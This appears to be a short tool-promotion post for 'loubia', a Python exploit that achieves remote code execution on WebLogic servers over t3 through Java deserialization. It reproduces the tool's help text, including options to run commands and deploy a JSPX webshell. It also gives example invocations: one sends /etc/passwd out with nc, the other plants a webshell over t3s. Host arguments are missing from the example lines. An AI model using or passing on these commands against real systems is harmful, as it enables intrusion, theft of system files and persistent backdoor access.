loubia – Python script to exploit java unserialize on t3 (Weblogic)

loubia tool

loubia Python script that achieves remote code execution on t3 enabled backends. This is possible thanks to (or because of) the Java Unserialize vulnerability.


Below is the help of Loubia showing its awesome functionalities:

    Usage: hostname port [options]
      --version             show program's version number and exit
      -h, --help            show this help message and exit
      -c PAYLOAD, --cmd=PAYLOAD
                            Command to execute
      -o OS, --os=OS        Target operating system (unix/win). Default is unix
      -l SHELL, --shell=SHELL
                            shell to use (sh/bash). Default is sh
      -s, --ssl             Use t3s protocol. Default : false
      -p PROTOCOL, --protocol=PROTOCOL
                            SSL protocol to use (sslv3/tlsv1/best). Default is
      -w, --webshell        Deploy a jspx webshell
      -u URL, --url=URL     Deploy the jspx webshell to the target URL path
                            (webshell name will be URL_.jspx)
      -v, --verbose         Print verbose output. Default : false


Disclosing /etc/passwd to a local listening socket

    ./ 7001 -c "cat /etc/passwd | nc 6666"

Deploying a webshell using bash on t3s

    ./ 7002 -s -l bash -w


You Might Also Like